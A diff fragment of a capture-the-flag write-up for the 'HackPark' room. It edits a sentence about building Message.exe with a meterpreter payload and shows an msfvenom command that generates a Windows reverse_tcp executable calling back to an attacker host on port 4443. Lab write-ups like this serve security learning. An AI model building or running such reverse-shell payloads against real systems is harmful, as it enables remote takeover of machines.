PacketFire/packetfire_site/content/post/hackpark-boot2-root-writeup.md

 11/18/20 15:02:01,Event Started Ok, (Administrator)
 ```

-I generated a new binary called Message.exe that pointed at port 4443, started a second listener on this port
+I generated a new binary called Message.exe that included a meterpreter payload that connected back to port 4443 and started a second listener on this port

 ```
 root@kali:~/ctf/transfer# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.7.59 LPORT=4443 -f exe -o Message.exe